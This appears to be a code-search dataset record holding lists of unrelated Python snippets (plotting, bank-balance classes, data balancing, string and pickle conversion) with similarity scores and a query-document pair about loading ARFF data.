plt.cm.Blues\n\t\t\tcm_pts = cm_pts = ListedColormap(['#FF0000', '#00FF00', '#0000FF'])\n\t\t\tZ = classifier.predict_proba(np.c_[md1.ravel(), md2.ravel()])\n\t\t\tZ1 = Z[:, 0]\n\t\t\tZ2 = Z[:, 1]\n\t\t\tZ3 = Z[:, 2]\n\n\t\t\tP1 = np.maximum(0, Z1 - np.maximum(Z2, Z3))\n\t\t\tP2 = np.maximum(0, Z2 - np.maximum(Z1, Z3))\n\t\t\tP3 = np.maximum(0, Z3 - np.maximum(Z1, Z2))\n\t\t\tP1 = P1.reshape(md1.shape)\n\t\t\tP2 = P2.reshape(md1.shape)\n\t\t\tP3 = P3.reshape(md1.shape)\n\n\t\t\tax.contourf(md1, md2, P1, levels, cmap=cm_bkgd_1, alpha=0.8)\n\t\t\tax.contourf(md1, md2, P2, levels, cmap=cm_bkgd_2, alpha=0.8)\n\t\t\tax.contourf(md1, md2, P3, levels, cmap=cm_bkgd_3, alpha=0.8)\n\n\t\td1 = X.iloc[:, 0] \t# x-axis\n\t\td2 = X.iloc[:, 1]\t# y-axis\n\t\tax.scatter(d1, d2, c=le.transform(y), cmap=cm_pts, alpha=0.6, edgecolors='k')\n\t\tax.set_xlim(md1.min(), md1.max())\n\t\tax.set_ylim(md2.min(), md2.max())\n\t\tax.set_xticks(())\n\t\tax.set_yticks(())\n\t\tax.set_xlabel(X.columns[0])\n\t\tax.set_ylabel(X.columns[1])\n\n\t\tcanvas.figure.tight_layout()\n\t\tcanvas.draw()", "def graph(self):\n seq_obj = MultiSequence(self.symbol, self.__best_model.window_size,1)\n test_predict = self.__best_model.model.predict(seq_obj.X)\n\n #our data is scaled between -1 and 1 so lets scale it back up\n scaler = MinMaxScaler(feature_range=(self.__min_price ,self.__max_price))\n orig_data = seq_obj.original_data.reshape(-1,1)\n orig_prices = scaler.fit_transform(orig_data).flatten()\n \n # plot actual prices\n plt.plot(orig_prices, color='k')\n \n # plot test set prediction after scaling back up\n length = len(seq_obj.X) + self.__best_model.window_size \n test_in = np.arange(self.__best_model.window_size,length,1)\n pred_prices = scaler.fit_transform(test_predict.reshape(-1,1)).flatten()\n plt.plot(test_in,pred_prices,color = 'b')\n \n # pretty up graph\n plt.xlabel('day')\n plt.ylabel('Closing price of stock')\n plt.title(\"Price prediction for {}\".format(self.symbol))\n plt.legend(['Actual','Prediction'],loc='center left', bbox_to_anchor=(1, 0.5))\n plt.show()", "def plot(self):\n h = .02\n i=1\n bags_X = self.bags_X\n bags_y = self.bags_y\n fig1 = plt.figure(figsize=(45, 9))\n\n \n cm = plt.cm.RdBu\n cm_bright = ListedColormap(['#FF0000', '#0000FF'])\n \n for model in self.models:\n ax = plt.subplot(1, len(self.models) , i)\n X = pd.DataFrame(bags_X[i-1])\n y = pd.Series(bags_y[i-1])\n x_min, x_max = X[X.columns[0]].min() - .5, X[X.columns[0]].max() + .5\n y_min, y_max = X[X.columns[1]].min() - .5, X[X.columns[1]].max() + .5\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h), np.arange(y_min, y_max, h))\n Z = np.array(model.predict(pd.DataFrame(np.c_[xx.ravel(), yy.ravel()], columns=X.columns)))\n # print(Z[12])\n Z = Z.reshape(xx.shape)\n ax.contourf(xx, yy, Z, cmap=cm, alpha=.8)\n ax.scatter(X[X.columns[0]], X[X.columns[1]], c=y, cmap=cm_bright, edgecolors='k')\n # size=[1000*w for w in self.weights[i-1]]\n ax.set_xlim(xx.min(), xx.max())\n ax.set_ylim(yy.min(), yy.max())\n ax.set_xlabel(str(X.columns[0]))\n ax.set_ylabel(str(X.columns[1]))\n plt.title(\"Estimator \"+str(i))\n i+=1\n \n fig2 = plt.figure(figsize=(9,9))\n X = self.X\n y = self.y\n ax2 = plt.subplot(1,1,1)\n x_min, x_max = X[X.columns[0]].min() - .5, X[X.columns[0]].max() + .5\n y_min, y_max = X[X.columns[1]].min() - .5, X[X.columns[1]].max() + .5\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h), np.arange(y_min, y_max, h))\n Z = np.array(self.predict(pd.DataFrame(np.c_[xx.ravel(), yy.ravel()], columns=X.columns)))\n Z = Z.reshape(xx.shape)\n ax2.contourf(xx, yy, Z, cmap=cm, alpha=.8)\n # size=[1000*w for w in self.weights[i-2]]\n ax2.scatter(X[X.columns[0]], X[X.columns[1]], c=y, cmap=cm_bright, edgecolors='k')\n ax2.set_xlim(xx.min(), xx.max())\n ax2.set_ylim(yy.min(), yy.max())\n plt.title(\"Combined Decision Surface\")\n \n plt.tight_layout()\n plt.show()\n\n return [fig1,fig2]", "def main(self, img, roi):\n\n self.img = img\n self.roi = roi\n transimg1, odimg1 = imageprocess.calc_absimage(np.dstack([img[:, :, 1],\n img[:, :, 5],\n img[:, :, 3]]),\n norm_edge=True)\n transimg2, odimg2 = imageprocess.calc_absimage(np.dstack([img[:, :, 2],\n img[:, :, 6],\n img[:, :, 4]]),\n norm_edge=True)\n odimg1 = imageprocess.normalize_edgestrip(odimg1)\n odimg2 = imageprocess.normalize_edgestrip(odimg2)\n balance = odimg1[roi].mean() / odimg2[roi].mean()\n\n self.ax1.imshow(transimg1, vmin=0, vmax=1.35, cmap=mpl.cm.gray)\n self.ax2.imshow(transimg2, vmin=0, vmax=1.35, cmap=mpl.cm.gray)\n self.balance_label.setText('The balance is %s'%balance)", "def plot_cost(self):\n steps = np.arange(len(self.cost_values))\n plt.plot(steps, self.cost_values, '-o')\n plt.xlabel(\"Steps\")\n plt.ylabel(\"Cost value\")\n plt.title(\"Cost value per step using Gradient Descent\")\n plt.show()", "def getClassBalance(pshapes, bounds, proj):\n\n xmin, ymin, xmax, ymax = bounds\n bpoly = Polygon([(xmin, ymax),\n (xmax, ymax),\n (xmax, ymin),\n (xmin, ymin)])\n project = partial(\n pyproj.transform,\n pyproj.Proj(proj='latlong', datum='WGS84'),\n proj)\n bpolyproj = transform(project, bpoly)\n totalarea = bpolyproj.area\n polyarea = 0\n for pshape in pshapes:\n polyarea += pshape.area\n\n return polyarea/totalarea", "def plot_star_classes(obj_catalog):\n\n fig = plt.figure(num=None,figsize=(8,8), dpi=100)\n ax = fig.add_subplot(1,1,1)\n\n phot_class = obj_catalog.phot_star_class\n sclass = obj_catalog.star_class\n phot_class_num = np.zeros(obj_catalog.shape[0])\n sclass_num = np.zeros(obj_catalog.shape[0])\n\n star_classes = ['WD',\\\n 'O','O8','O9','OB','B0','B1','B2','B3','B5','B6','B7','B8','B9',\\\n 'A0','A1','A2','A3','A4','A5','A6','A8','A9',\\\n 'F0','F2','F3','F5','F6','F8','F9',\\\n 'G0','G1','G2','G3','G4','G5','G8','G9',\\\n 'K0','K1','K2','K3','K4','K5','K7',\\\n 'M0','M1','M2','M3','M4','M5','M6','M7','M8','M9', \\\n 'L0','L1','L2','L3','L4','L5','L9','Ldwarf', \\\n 'T','other','C']\n print len(star_classes)\n\n star_dict = dict(zip(star_classes,np.arange(len(star_classes))))\n\n # print phot_class.value_counts()\n\n for i in range(len(phot_class)):\n print phot_class[i], star_dict[phot_class[i]], sclass[i],star_dict[sclass[i]]\n phot_class_num[i] = star_dict[phot_class[i]]\n sclass_num[i] = star_dict[sclass[i]]\n\n #ax.plot(sclass_num,phot_class_num,'.')\n\n cmap = plt.cm.Blues\n cmap.set_bad('0.85',1.0)\n\n cax = plt.hist2d(sclass_num,phot_class_num, bins=65,range = [[0,65], [0,65]], norm = LogNorm(), cmap=cmap, zorder=0)\n cbar = plt.colorbar(ticks=[1,5,10,15,20,25,30,40])\n cbar.ax.set_yticklabels([1,5,10,15,20,25,30,40],fontsize=12)\n\n ax.plot(np.arange(65),np.arange(65),'r')\n\n plt.xticks(np.arange(len(star_classes)),star_classes,fontsize=8,rotation='vertical')\n plt.yticks(np.arange(len(star_classes)),star_classes,fontsize=8)\n\n plt.grid(True)\n return plt", "def generation(self,rounds):\n a = []\n b = []\n for i in range(rounds):\n self.fight()\n c = self.avgFitness()\n a.append(c[0])\n b.append(c[1])\n self.sort()\n self.cull()\n self.rePop()\n self.refresh()\n self.fight()\n self.sort()\n print self\n plt.scatter([x for x in range(len(a))],a,color = \"red\")\n plt.scatter([x for x in range(len(b))],b,color = \"green\")\n plt.show()", "def generation(self,rounds):\n a = []\n b = []\n for i in range(rounds):\n self.fight()\n c = self.avgFitness()\n a.append(c[0])\n b.append(c[1])\n self.sort()\n self.cull()\n self.rePop()\n self.refresh()\n self.fight()\n self.sort()\n print self\n plt.scatter([x for x in range(len(a))],a,color = \"red\")\n plt.scatter([x for x in range(len(b))],b,color = \"green\")\n plt.show()", "def draw_discount_curve(self):\n data=Bootstrapping.get_ytm_discount_data(self)\n fig = plt.figure(figsize=[10, 6])\n ax = fig.add_subplot(1, 1, 1)\n ax.plot(data['discount_rate'])\n ax.set_xlabel('Term')\n ax.set_ylabel('value')\n ax.set_title('Discount Curves')\n plt.show()", "def __init__(self, initial_balance):\n self.balance = initial_balance\n self.fees = 0", "def graph_results(loss, acc):\n N = len(loss)\n x = np.linspace(0, N, N)\n plt.subplot(1,2,1)\n plt.plot(x, loss)\n plt.subplot(1,2,2)\n plt.plot(x,acc)\n plt.show()", "def __init__(self,owner,balance):\r\n self.owner = owner\r\n self.balance = balance\r\n #print(f\"Account owner: {self.owner} \\nAccount Balance: {self.balance}\")\r\n print(\"{}'s balance is {}\".format(self.owner,self.balance))", "def visualize(self, time, pred, true):\n plt.plot(time, true, label='Actual')\n plt.plot(time, pred, label='Predicted')\n plt.xlabel('Time')\n plt.ylabel('Price ($)')\n plt.legend(bbox_to_anchor=(0.1, 1), loc=2, borderaxespad=0.,\n prop={'size': 14})\n plt.show()", "def printBalance(self):\n\n print(\"\\nBalance - {self.name}\".format(self=self))\n print(\"Account balance: £{self.balance:.2f}\".format(self=self))\n \n # if overdraft is available, also prints overdraft details\n if self.overdraft == True:\n availableBalance = self.getAvailableBalance()\n print(\"Remaining overdraft: £{0:.2f}\\nOverdraft limit: £{1:.2f}\".format(availableBalance, self.overdraftLimit))", "def count_plot_target_class(self):\r\n print(self.dataframe_name)\r\n print(self.data_frame.groupby([self.target_column]).size()) # print the sum of every class\r\n\r\n sns.countplot(data=self.data_frame, x=self.data_frame[self.target_column])\r\n plt.title(self.dataframe_name + ': Display the distribution of ' + self.target_column + ' class')\r\n plt.xlabel('Target Name: ' + self.target_column)\r\n plt.ylabel('Count')\r\n self.save_plot_as_image()\r\n plt.show()", "def plot_student_adj(df, with_self=True):\n fig, axes = plt.subplots(3, sharex=True)\n df = df.sort_values('Final Adj Factor')\n df.plot(x='Student Name', y='Mean Adj Factor', kind='bar',\n yerr='STD Adj Factor', ylim=(0.6, 1.1), ax=axes[0])\n df.plot(x='Student Name', y='Improvement', kind='bar', ax=axes[1])\n df.plot(x='Student Name', y='Final Adj Factor', kind='bar',\n ylim=(0.70, 1.1), ax=axes[2])\n return axes", "def _subdiff_b(self, i, compensate_class_balance=False):\n if 1 - self._data.train_y[i] * self._f(self._data.train_X[:, i]) > 0:\n if compensate_class_balance:\n return - self._data.train_y[i] * self._data.importance(self._data.train_y[i])\n else:\n return - self._data.train_y[i]\n else:\n return 0", "def plot_diff(self):\n if not(self.is_attribute(\"time\") & self.is_attribute(\"intensity_up\") & \n self.is_attribute(\"intensity_up_sigma\") &\n self.is_attribute(\"intensity_down\") & \n self.is_attribute(\"intensity_down_sigma\") &\n self.is_attribute(\"intensity_up_total\") &\n self.is_attribute(\"intensity_down_total\")):\n return\n fig, ax = plt.subplots()\n ax.set_title(\"Polarized intensity: I_up - I_down\")\n ax.set_xlabel(\"Time (microseconds)\")\n ax.set_ylabel('Intensity')\n \n np_time = numpy.array(self.time, dtype=float)\n np_up = numpy.array(self.intensity_up, dtype=float)\n np_sup = numpy.array(self.intensity_up_sigma, dtype=float)\n np_up_mod = numpy.array(self.intensity_up_total, dtype=float)\n np_down = numpy.array(self.intensity_down, dtype=float)\n np_sdown = numpy.array(self.intensity_down_sigma, dtype=float)\n np_down_mod = numpy.array(self.intensity_down_total, dtype=float)\n np_diff = np_up - np_down\n np_diff_mod = np_up_mod - np_down_mod\n np_sdiff = numpy.sqrt(numpy.square(np_sup)+numpy.square(np_sdown))\n\n ax.plot([np_time.min(), np_time.max()], [0., 0.], \"b:\")\n ax.plot(np_time, np_diff_mod, \"k-\",\n label=\"model\")\n ax.errorbar(np_time, np_diff, yerr=np_sdiff, fmt=\"ko\", alpha=0.2,\n label=\"experiment\")\n\n y_min_d, y_max_d = ax.get_ylim()\n param = y_min_d-(np_diff-np_diff_mod).max()\n\n ax.plot([np_time.min(), np_time.max()], [param, param], \"k:\")\n ax.plot(np_time, np_diff-np_diff_mod+param, \"r-\", alpha=0.7,\n label=\"difference\")\n ax.legend(loc='upper right')\n fig.tight_layout()\n return (fig, ax)", "def __balance_data(self):\n # Shuffle each class independently (This is useful in case of multiple root directories because it does not\n # discard only elements of the last listed root directory, but random elements of all root directories)\n start_index = 0\n for class_id, num_samples_in_this_class in enumerate(self.__samples_per_class):\n permutation = np.random.permutation(num_samples_in_this_class)\n self.__image_file_names[start_index:start_index + num_samples_in_this_class] = \\\n self.__image_file_names[start_index:start_index + num_samples_in_this_class][permutation]\n start_index += num_samples_in_this_class\n\n class_with_min_samples = np.argmin(self.__samples_per_class)\n num_min_samples = self.__samples_per_class[class_with_min_samples]\n\n # Remove all elements in the majority classes in order to balance their sample numbers to the minority class.\n start_index = 0\n elements_to_delete = []\n for num_samples_in_this_class in self.__samples_per_class:\n new_indices_to_delete = [i for i in\n range(start_index + num_min_samples, start_index + num_samples_in_this_class)]\n elements_to_delete.extend(new_indices_to_delete)\n start_index += num_samples_in_this_class\n\n self.__labels = np.delete(self.__labels, elements_to_delete)\n self.__image_file_names = np.delete(self.__image_file_names, elements_to_delete)\n\n # Check for class balance.\n cumulator = np.zeros(shape=3)\n for label in self.__labels:\n cumulator[label] += 1\n for i in range(2):\n if cumulator[i] != cumulator[i + 1]:\n raise RuntimeError(\"Error in data balancing: resulting label distribution: {}\".format(cumulator))\n\n self.__samples_per_class = [num_min_samples for _ in range(self.num_classes)]", "def plot_comparisons(self, exact, blocked, blockederr, axdelta=None):\n if axdelta is None:\n axdelta = plt.gca()\n delta = self.means - exact\n axdelta.errorbar(list(range(1, self.max_dets)), delta[0], yerr=self.stderr[0], label='independent')\n axdelta.errorbar(list(range(1, self.max_dets)), delta[1], yerr=self.stderr[1], label='correlated')\n axdelta.axhline(delta[0, 0], linestyle=':', color='grey', label='reference')\n axdelta.axhline(0, linestyle='-', linewidth=1, color='black')\n if blocked:\n axdelta.axhline(blocked-exact, linestyle='--', color='darkgreen', label='reblocked')\n if blockederr:\n axdelta.fill_between([0, self.max_dets], [blocked-exact-blockederr,blocked-exact-blockederr],\n [blocked-exact+blockederr,blocked-exact+blockederr], color='green', alpha=0.2)\n axdelta.set_xlabel('Number of determinants in estimator')\n axdelta.set_ylabel(r'$E-E_\\mathrm{CCSD}$ / ha')\n axdelta.legend()\n return axdelta", "def visualize(X: pd.DataFrame, y: pd.DataFrame) -> None:\r\n y[\"Action\"].value_counts().plot.pie(explode=(0.02, 0.04, 0.05, 0.09), title=\"Proportion of classes in dataset\")\r\n plt.savefig(\"Figures/proportions\")\r\n\r\n for i, column in enumerate(X.columns):\r\n fig, ax = plt.subplots(1, 2)\r\n\r\n ax[0].hist(\r\n (\r\n X[y[\"Action\"] == \"allow\"][column],\r\n X[y[\"Action\"] == \"deny\"][column],\r\n X[y[\"Action\"] == \"drop\"][column],\r\n X[y[\"Action\"] == \"reset-both\"][column],\r\n )\r\n )\r\n ax[0].set_xlabel(column)\r\n ax[0].set_ylabel(\"Frequency\")\r\n\r\n ax[1].boxplot(\r\n (\r\n X[y[\"Action\"] == \"allow\"][column],\r\n X[y[\"Action\"] == \"deny\"][column],\r\n X[y[\"Action\"] == \"drop\"][column],\r\n X[y[\"Action\"] == \"reset-both\"][column],\r\n )\r\n )\r\n ax[1].set_xlabel(\"Action\")\r\n ax[1].set_ylabel(column)\r\n\r\n X[column].hist(by=y[\"Action\"])\r\n\r\n ax[0].legend([\"allow\", \"deny\", \"drop\", \"reset-both\"])\r\n ax[1].set_xticklabels([\"allow\", \"deny\", \"drop\", \"reset-both\"])\r\n fig.suptitle(\"Distribution of classes among attributes\")\r\n plt.savefig(\"Figures/boxplots\")", "def test_class():\n riskfree = .03\n maturity = 30/365\n moneyness = np.linspace(-.04, .04, 10)\n premium = np.ones_like(moneyness) * .05\n call = True\n data = {'riskfree': riskfree, 'maturity': maturity,\n 'moneyness': moneyness, 'call': call, 'premium': premium}\n\n sigma = .13\n bsm = BSmodel(sigma, data)\n\n weights = [.63]\n means = [-.01, .09]\n stds = [.16, .05]\n param = weights + means + stds\n mbs = MBSmodel(param, data)\n\n param_a, param_p, param_c = 4, 1.5, -.05\n gb2 = GB2model([param_a, param_p, param_c], data)\n print(gb2.get_pnames())\n\n plt.figure()\n for model in [bsm, mbs, gb2]:\n plt.plot(moneyness, model.density(moneyness), label=model.get_name())\n plt.legend()\n plt.show()\n\n plt.figure()\n for model in [bsm, mbs, gb2]:\n plt.plot(moneyness, model.premium(), label=model.get_name())\n plt.legend()\n plt.show()\n\n plt.figure()\n for model in [bsm, mbs, gb2]:\n plt.plot(moneyness, model.impvol(), label=model.get_name())\n plt.legend()\n plt.show()\n\n print('BS objective function = %.4f' % bsm.objective(sigma))\n print('GB2 objective function = %.4f'\n % gb2.objective([param_a, param_p, param_c]))", "def plot_betweeness(net, label, outpath):\n _, betweeness_values = networkit_util.get_betweeness(net, label, outpath)\n unique_value, unique_cnt = np.unique(betweeness_values, return_counts=True)\n unique_cumcnt = np.cumsum(unique_cnt) / sum(unique_cnt)\n fig = plt.figure()\n ax = fig.add_subplot(1, 1, 1)\n ax.plot(unique_value, unique_cumcnt, 'b.')\n # ax.set_title('Cumulative distribution of betweeness centrality of nodes')\n ax.set_xlabel('betweeness centrality b')\n ax.set_ylabel('p(x <= b)')\n plt.savefig(outpath + label + \"-betweeness-distribution.eps\")", "def plot(self):\n\t\tself.plotOfHeatingCurrent().plot()", "def plot(self):\n x = np.arange(5)\n # labels = ['temp', 'humi', 'mais', 'o2', 'co2']\n plt.bar(x - 0.35/2, self.data, 0.35, label='actual')\n plt.bar(x + 0.35/2, self.desired_values, 0.35, label='desired')\n plt.ylim(-5, 80)\n plt.legend()\n\n plt.draw()\n plt.pause(0.000001)\n plt.clf()", "def drawBolts(self,view):\r\n for bolt in self.getBolts():\r\n bolt.draw(view)", "def balance(self):\n return self._rbal - self._lbal", "def plot(t): \n assert isinstance(t, int), \"'t' argument should be an integer.\"\n assert t > 0, \"'t' argument should be a positive integer.\" \n # Initialize arrays with zeros to store mean cumulative rewards upto t \n # rounds for each of the three implemented bandit algorithms\n EpsGreedy_rewards = np.zeros(t)\n UCB_rewards = np.zeros(t)\n LinUCB_rewards = np.zeros(t)\n # For each round, store the mean cumulative rewards upto that round\n for i in range(1,t):\n EpsGreedy_rewards[i] = np.sum(results_EpsGreedy[0:i]) / t\n UCB_rewards[i] = np.sum(results_UCB[0:i]) / t\n LinUCB_rewards[i] = np.sum(results_LinUCB[0:i]) / t\n # Plot running per round cumulative reward\n plt.plot(range(0,t), EpsGreedy_rewards, color='b', label='e-Greedy')\n plt.plot(range(0,t), UCB_rewards, color='g', label='UCB')\n plt.plot(range(0,t), LinUCB_rewards, color='orange', label='LinUCB')\n plt.xlabel('Round')\n plt.ylabel('Mean Cumulative Reward')\n plt.title('Running Per Round Cumulative Reward')\n plt.legend()\n plt.show()", "def plotLoss():\n # ssr\n ssr = np.log(gradientDescent(X, y)[1])\n # number of iterations \n iterations = np.log(np.arange(1, len(ssr) + 1, 1))\n # plot reduction of ssr\n plt.plot(iterations, ssr)\n # xlabel\n plt.xlabel(\"Iteration\")\n # ylabel\n plt.ylabel(\"SSR\")\n # title\n plt.title(\"Reduction of SSR by number of Iterations\")\n # show plot \n plt.show()", "def costovertime(endclasses, app, costtype='expected cost'):\n costovertime = cost_table(endclasses, app)\n plt.plot(list(costovertime.index), costovertime[costtype])\n plt.title('Total '+costtype+' of all faults over time.')\n plt.ylabel(costtype)\n plt.xlabel(\"Time (\"+str(app.units)+\")\")\n plt.grid()", "def __repr__(self) -> str:\n return f\"Bank({self.balance}, {self.bet})\"" ]
[ "0.6470689", "0.62615764", "0.618939", "0.5848157", "0.58320725", "0.5751623", "0.5716817", "0.5682445", "0.56821924", "0.56675744", "0.5648744", "0.5599107", "0.5581174", "0.5550323", "0.5517062", "0.5514832", "0.54800415", "0.54709786", "0.5425537", "0.54238087", "0.5382205", "0.53711027", "0.5350087", "0.5349848", "0.53112686", "0.52882284", "0.527825", "0.52674305", "0.5238933", "0.52361184", "0.5235", "0.52225685", "0.52177435", "0.52147824", "0.52115756", "0.52102834", "0.5207359", "0.5195552", "0.5189379", "0.5184997", "0.51740426", "0.51714575", "0.5159294", "0.5144024", "0.51420605", "0.51228607", "0.5122118", "0.5120399", "0.5116186", "0.51022446", "0.5101852", "0.5096412", "0.50951785", "0.50929695", "0.50925815", "0.5090533", "0.50903463", "0.5086222", "0.50695467", "0.5056686", "0.50497365", "0.50305045", "0.5029833", "0.50278145", "0.5019516", "0.50136244", "0.5011389", "0.50084513", "0.49997485", "0.49986804", "0.499514", "0.49943736", "0.49903634", "0.49849582", "0.4981833", "0.49804908", "0.49804908", "0.49773884", "0.4974798", "0.49739426", "0.49661383", "0.49567854", "0.49560815", "0.4955321", "0.49531296", "0.4952347", "0.49521738", "0.49496284", "0.49464715", "0.49458325", "0.49415788", "0.4937927", "0.4931714", "0.4930924", "0.49285764", "0.49195182", "0.4912592", "0.49115992", "0.49100682", "0.49099198" ]
0.7392071
0
Load data and convert class type to str
def load_data(dataset_path: str): data = arff.loadarff(dataset_path) data_frame = pd.DataFrame(data[0]) return data_frame
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _convert_to_str(self, data):\n raise NotImplementedError()", "def loaddata(cls, data, auto_cls=True):\n keys = data.dtype.fields if hasattr(data, 'dtype') else data\n if auto_cls and 'class' in keys:\n cls_components = str(data['class']).split('.')\n mod_name = '.'.join(cls_components[:-1])\n cls_name = cls_components[-1]\n try:\n mod = import_module(mod_name)\n except ImportError:\n mod = import_module(__name__)\n cls = getattr(mod, cls_name)\n obj = cls(board_size=None)\n obj.deserialize(data)\n return obj", "def loads(self, data):\n return loads(data)", "def __str__(self):\n return str(self.__data)", "def __str__(self):\n return str(self.data)", "def __str__(self):\n return str(self.data)", "def __str__(self):\n return str(self.data)", "def __str__(self):\n return str(self.data)", "def __str__(self):\n return str(self.data)", "def __str__(self):\n return self.data.__str__()", "def __str__(self):\n return self.data.__str__()", "def load_data(self) -> None:", "def load_data(self):", "def load_hickle_4_x_string(h_node,base_type,py_obj_type):\n if not 'object' in h_node.dtype.name or h_node.attrs.get('str_type',None) is not None:\n return load_list_dataset(h_node,base_type,py_obj_type)\n content = h_node[()]\n if py_obj_type is str:\n return content if isinstance(content,str) else content.decode('utf8')\n return py_obj_type(content) if content.__class__ is not py_obj_type else content", "def __str__(self):\n str(self.data)\n return str", "def __str__(self) -> str:\n return str(self.data)", "def __str__(self):\n return str(self._data)", "def __str__(self):\n return str(self.get_data())", "def load(cls, data):\n if isinstance(data, dict):\n print('>>> dict')\n else:\n print('>>> obj')\n # cls_fields = fields(cls)\n init()", "def get_load(self):\n return str(self.load)", "def class_to_db(self):", "def load(self):", "def as_str(self) -> str:\n if isinstance(self.data, str):\n return self.data\n elif isinstance(self.data, bytes):\n return self.data.decode()\n else:\n return bytes(self.data).decode()", "def load_data(self):\n raise NotImplementedError()", "def _as_string(self, name):\n org_type = self._get_type(name)\n if org_type == 'string': return None\n valid = ['single', 'delimited set', 'int', 'float', 'date']\n if not org_type in valid:\n msg = 'Cannot convert variable {} of type {} to text!'\n raise TypeError(msg.format(name, org_type))\n self._meta['columns'][name]['type'] = 'string'\n if self._get_type in ['single', 'delimited set']:\n self._meta['columns'][name].pop('values')\n self._data[name] = self._data[name].astype(str)\n return None", "def convertTo( self, cls, data=True, keys=True ):\n return self.g.convertTo( cls, data=data, keys=keys )", "def load(self):\n pass", "def load(self):\n pass", "def load(self):\n pass", "def load(self):\n pass", "def load(cls,data:{}, X=None):\n return cls._load(data=data, X=X)", "def loads(data):\n return cPickle.loads(data)", "def dataclass(self, arg: SeField[Any]) -> str:\n if arg.flatten:\n flattened = []\n for f in sefields(arg.type, self.serialize_class_var):\n f.parent = arg # type: ignore\n flattened.append(self.render(f))\n return \", \".join(flattened)\n else:\n return (\n f\"{arg.varname}.{SERDE_SCOPE}.funcs['{self.func}']({arg.varname},\"\n \" reuse_instances=reuse_instances, convert_sets=convert_sets)\"\n )", "def _toStringSubclass(self, text, subclass):\r\n self.endData()\r\n self.handle_data(text)\r\n self.endData(subclass)", "def serialize(self, data):\n if isinstance(data, str):\n return data\n\n if hasattr(data, \"read\"):\n return data.read()\n\n raise ValueError(\"Unable to handle input format: %s\" % type(data))", "def post_load(self, data):\n return data", "def __str__(self):\n return bytes_to_str(bytes(self))", "def convertInstanceData(self, builder, typeName, data):\n\t\tif typeName not in self.instanceDataTypeMap:\n\t\t\traise Exception('Instance data type \"' + typeName + '\" hasn\\'t been registered.')\n\n\t\tconvertedData = self.instanceDataTypeMap[typeName](self, data)\n\n\t\ttypeNameOffset = builder.CreateString(typeName)\n\t\tdataOffset = builder.CreateByteVector(convertedData)\n\n\t\tObjectData.Start(builder)\n\t\tObjectData.AddType(builder, typeNameOffset)\n\t\tObjectData.AddData(builder, dataOffset)\n\t\treturn ObjectData.End(builder)", "def load_class(self):\n if not os.path.exists(self.savefile):\n self.save_class()\n\n with open(self.savefile, \"r\") as f:\n data = json.load(f)\n for key, value in data.items():\n # set every dict key to an atribute of the class\n setattr(self, key, value) # self.key = value", "def loads(data):\n return Decoder().decode(data)", "def _deserialize_primitive(data, klass):\n try:\n value = klass(data)\n except UnicodeEncodeError:\n value = unicode(data)\n except TypeError:\n value = data\n return value", "def ingest(d):\n if isinstance(d, rawtype):\n return raw2str(d)\n elif isinstance(d, safetype):\n return d\n else:\n raise TypeError(\"Can't ingest data of type %s\" % type(d))", "def load(cls, data):\n if cls.Schema is None: # pragma: no cover\n msg = (\"Schema of this Model are not specified! For example: \"\n \"class User(BaseModel): ...; class UserSchema(Schema): ...; \"\n \"User.Schema = UserSchema\")\n raise NotImplementedError(msg)\n\n res = cls.Schema().load(data)\n if len(res.errors) == 0:\n return res.data\n else:\n raise Exception(\"Errors: {}\".format(res.errors))", "def to_representation(self, data): # lint-amnesty, pylint: disable=arguments-differ\n return str(data)", "def to_representation(self, data): # lint-amnesty, pylint: disable=arguments-differ\n return str(data)", "def load(self):\n\n raise NotImplementedError", "def test_user_type_repr():\n Person = Map.from_file(\"definitions/Person.buf\")\n me = Person(name=\"Bede Kelly\", age=20)\n assert \"Person(name='Bede Kelly', age=20)\" == str(me) == repr(me)", "def __str__(self):\n return str(self.serialize())", "def deserialize(self, data):", "def bytes_to_str(self, data):\n if isinstance(data, str):\n return data\n return data.decode(\"utf-8\")", "def load(self):\n raise NotImplementedError", "def load(self):\n raise NotImplementedError", "def load(cls):\n playerdata = Data.raw_load(\"savedata.dat\")\n for key in playerdata:\n cls.name = playerdata[\"name\"]\n cls.max_hp = playerdata[\"max_hp\"]\n cls.hp = playerdata[\"hp\"]\n cls.lv = playerdata[\"lv\"]\n cls.exp = playerdata[\"exp\"]\n cls.atk = playerdata[\"atk\"]\n cls._def = playerdata[\"_def\"]\n cls.inventory = playerdata[\"inventory\"]\n cls.pin = playerdata[\"pin\"]", "def __repr__(self):\n return str(self.data)", "def load(self):\n return loads(self.get_attr().Value())", "def load_classes():\n \tfnm = \"../datasets/bbc/bbc.classes\"\n \tconverters = { \"docid\": toInt, \"docid\":toInt}\n \tX = pandas.read_table(fnm, header=None, sep=\" \", skiprows=4, comment=\"%\", names= [\"docid\", \"classid\"], converters=converters)\n \treturn X", "def serialize(self, data):", "def convert_to_string(user_data):\n # type: (Any) -> str\n if isinstance(user_data, Mapping):\n return convert_dict_to_string(user_data)\n\n # hydra ConfigNode special case:\n if hasattr(user_data, \"node\"):\n return convert_dict_to_string(user_data.node)\n\n if hasattr(user_data, \"numpy\"):\n user_data = convert_tensor_to_numpy(user_data)\n\n if isinstance(user_data, bytes) and not isinstance(user_data, str):\n user_data = user_data.decode(\"utf-8\")\n\n return str(user_data)", "def __str__(self):\n\t\treturn str(self.dato)", "def __str__(self):\n return str(self.GetString())", "def load(cls, data):\n return cls(**data)", "def to_content(cls, data: Mapping) -> str:", "def serialize(self, data):\n if isinstance(data, str):\n try:\n with open(data, \"rb\") as data_file:\n data_file_info = data_file.read()\n return data_file_info\n except Exception as e:\n raise ValueError(f\"Could not open/read file: {data}. {e}\")\n if isinstance(data, bytes):\n return data\n\n raise ValueError(f\"Object of type {type(data)} is not Data serializable.\")", "def get_data_class(self):\n return self.data_class", "def __str__(self):\n return self.__unicode__().encode('utf-8').decode()", "def test_repr(self, cls):\n inst = cls()\n # Exact values aren't a concern so long as neither direction\n # raises an exception.\n pkl = cloudpickle.dumps(inst)\n cloudpickle.loads(pkl)", "def _get_converted_data(self):\n pass", "def TypeclassToString(_type):\r\n\r\n typestring = str(type(_type))\r\n\r\n if typestring == \"<class 'type'>\":\r\n # This means that _type is a Python data type, and not an instance of that type.\r\n typestring = str(_type)\r\n\r\n # Formatting typestring to remove \"<class '\" and \"'>\" parts\r\n typestring = typestring.replace(\"<class '\", \"\")\r\n typestring = typestring.replace(\"'>\", \"\")\r\n\r\n return typestring", "def _load(self, data):\n raise NotImplementedError(\"Don't know how to load the task\")", "def 